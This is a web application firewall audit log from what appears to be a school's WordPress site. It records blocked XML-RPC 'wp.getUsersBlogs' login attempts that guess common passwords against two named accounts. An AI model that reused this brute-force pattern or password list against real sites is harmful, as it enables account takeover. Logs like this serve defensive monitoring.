8181 --9b85fe03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9b85fe03-C-- wp.getUsersBlogs timkreatif servmask --9b85fe03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b85fe03-E-- --9b85fe03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (154+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779355015197 4334 (- - -) Stopwatch2: 1744779355015197 4334; combined=3400, p1=376, p2=2840, p3=0, p4=0, p5=106, sr=81, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b85fe03-Z-- --824e1362-A-- [16/Apr/2025:11:56:55 +0700] Z_84lype92T0H9-Aa0zAlAAAAFg 103.236.140.4 46302 103.236.140.4 8181 --824e1362-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --824e1362-C-- wp.getUsersBlogs timkreatif marketing_ --824e1362-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --824e1362-E-- --824e1362-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779415226535 4477 (- - -) Stopwatch2: 1744779415226535 4477; combined=3368, p1=342, p2=2811, p3=0, p4=0, p5=121, sr=80, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --824e1362-Z-- --df41471a-A-- [16/Apr/2025:11:57:56 +0700] Z_841Cpe92T0H9-Aa0zBFwAAAEs 103.236.140.4 46598 103.236.140.4 8181 --df41471a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --df41471a-C-- wp.getUsersBlogs timkreatif 1201230 --df41471a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df41471a-E-- --df41471a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779476624501 4245 (- - -) Stopwatch2: 1744779476624501 4245; combined=3229, p1=353, p2=2711, p3=0, p4=0, p5=96, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df41471a-Z-- --8ec76974-A-- [16/Apr/2025:11:58:56 +0700] Z_85ECpe92T0H9-Aa0zBSwAAAEw 103.236.140.4 46882 103.236.140.4 8181 --8ec76974-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8ec76974-C-- wp.getUsersBlogs timkreatif foobar --8ec76974-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ec76974-E-- --8ec76974-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779536081934 4325 (- - -) Stopwatch2: 1744779536081934 4325; combined=3383, p1=375, p2=2839, p3=0, p4=0, p5=98, sr=84, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ec76974-Z-- --182b2b0a-A-- [16/Apr/2025:11:59:26 +0700] Z_85Lipe92T0H9-Aa0zBkwAAAEU 103.236.140.4 47038 103.236.140.4 8181 --182b2b0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --182b2b0a-C-- wp.getUsersBlogs timkreatif 1234%^&* --182b2b0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --182b2b0a-E-- --182b2b0a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779566337693 4891 (- - -) Stopwatch2: 1744779566337693 4891; combined=3589, p1=424, p2=2974, p3=0, p4=0, p5=112, sr=86, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --182b2b0a-Z-- --8e8ae10b-A-- [16/Apr/2025:11:59:56 +0700] Z_85TCpe92T0H9-Aa0zB0AAAAEc 103.236.140.4 47188 103.236.140.4 8181 --8e8ae10b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8e8ae10b-C-- wp.getUsersBlogs timkreatif dubsmash --8e8ae10b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e8ae10b-E-- --8e8ae10b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779596277520 3351 (- - -) Stopwatch2: 1744779596277520 3351; combined=2525, p1=278, p2=2115, p3=0, p4=0, p5=77, sr=63, sw=55, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e8ae10b-Z-- --f390456a-A-- [16/Apr/2025:12:00:56 +0700] Z_85iCpe92T0H9-Aa0zCMgAAAEQ 103.236.140.4 47472 103.236.140.4 8181 --f390456a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f390456a-C-- wp.getUsersBlogs timkreatif 20100728 --f390456a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f390456a-E-- --f390456a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779656307096 4422 (- - -) Stopwatch2: 1744779656307096 4422; combined=3392, p1=376, p2=2836, p3=0, p4=0, p5=104, sr=83, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f390456a-Z-- --e6360e7a-A-- [16/Apr/2025:12:01:56 +0700] Z_85xCpe92T0H9-Aa0zCfAAAAEs 103.236.140.4 47694 103.236.140.4 8181 --e6360e7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e6360e7a-C-- wp.getUsersBlogs timkreatif rangers1 --e6360e7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6360e7a-E-- --e6360e7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (107+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779716251152 4378 (- - -) Stopwatch2: 1744779716251152 4378; combined=3374, p1=390, p2=2820, p3=0, p4=0, p5=96, sr=83, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6360e7a-Z-- --a0d63a01-A-- [16/Apr/2025:12:02:56 +0700] Z_86AJVnVduWmh0dMDMa_AAAAIs 103.236.140.4 47982 103.236.140.4 8181 --a0d63a01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a0d63a01-C-- wp.getUsersBlogs miswan miswan2016 --a0d63a01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0d63a01-E-- --a0d63a01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779776281761 4207 (- - -) Stopwatch2: 1744779776281761 4207; combined=3217, p1=359, p2=2692, p3=0, p4=0, p5=97, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0d63a01-Z-- --30936f4d-A-- [16/Apr/2025:12:03:56 +0700] Z_86PCpe92T0H9-Aa0zCpQAAAEg 103.236.140.4 48272 103.236.140.4 8181 --30936f4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --30936f4d-C-- wp.getUsersBlogs miswan trustno1 --30936f4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30936f4d-E-- --30936f4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779836336904 4366 (- - -) Stopwatch2: 1744779836336904 4366; combined=3420, p1=383, p2=2869, p3=0, p4=0, p5=98, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30936f4d-Z-- --28a2e56d-A-- [16/Apr/2025:12:04:56 +0700] Z_86eCpe92T0H9-Aa0zDEgAAAEA 103.236.140.4 48576 103.236.140.4 8181 --28a2e56d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --28a2e56d-C-- wp.getUsersBlogs miswan 123465 --28a2e56d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28a2e56d-E-- --28a2e56d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (142+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779896273293 4861 (- - -) Stopwatch2: 1744779896273293 4861; combined=3425, p1=451, p2=2817, p3=0, p4=0, p5=92, sr=87, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28a2e56d-Z-- --617b814b-A-- [16/Apr/2025:12:05:56 +0700] Z_86tBk9XPLR9cFiTEvIDQAAAA8 103.236.140.4 48854 103.236.140.4 8181 --617b814b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --617b814b-C-- wp.getUsersBlogs miswan 852654 --617b814b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --617b814b-E-- --617b814b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (133+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779956132475 4226 (- - -) Stopwatch2: 1744779956132475 4226; combined=3221, p1=340, p2=2714, p3=0, p4=0, p5=97, sr=78, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --617b814b-Z-- --4adc240f-A-- [16/Apr/2025:12:06:56 +0700] Z_868Bk9XPLR9cFiTEvIpAAAAAM 103.236.140.4 49168 103.236.140.4 8181 --4adc240f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4adc240f-C-- wp.getUsersBlogs miswan qwe123!@# --4adc240f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4adc240f-E-- --4adc240f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744780016350488 4308 (- - -) Stopwatch2: 1744780016350488 4308; combined=3240, p1=360, p2=2725, p3=0, p4=0, p5=90, sr=81, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4adc240f-Z-- --9b57f96b-A-- [16/Apr/2025:12:06:56 +0700] Z_868Bk9XPLR9cFiTEvIpQAAAAI 103.236.140.4 49170 103.236.140.4 8181 --9b57f96b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9b57f96b-C-- wp.getUsersBlogs miswan 1234%^&* --9b57f96b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b57f96b-E-- --9b57f96b-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744780016697472 4288 (- - -) Stopwatch2: 1744780016697472 4288; combined=3293, p1=340, p2=2780, p3=0, p4=0, p5=103, sr=78, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b57f96b-Z-- --f2ceae2c-A-- [16/Apr/2025:12:07:57 +0700] Z_87LRk9XPLR9cFiTEvJGQAAAAQ 103.236.140.4 49460 103.236.140.4 8181 --f2ceae2c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f2ceae2c-C-- wp.getUsersBlogs miswan Testing1 --f2ceae2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2ceae2c-E-- --f2ceae2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744780077053958 3661 (- - -) Stopwatch2: 1744780077053958 3661; combined=2790, p1=344, p2=2301, p3=0, p4=0, p5=85, sr=72, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2ceae2c-Z-- --a2a2a856-A-- [16/Apr/2025:12:08:57 +0700] Z_87aRk9XPLR9cFiTEvJgwAAABY 103.236.140.4 49732 103.236.140.4 8181 --a2a2a856-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a2a2a856-C-- wp.getUsersBlogs miswan superman1 --a2a2a856-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2a2a856-E-- --a2a2a856-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
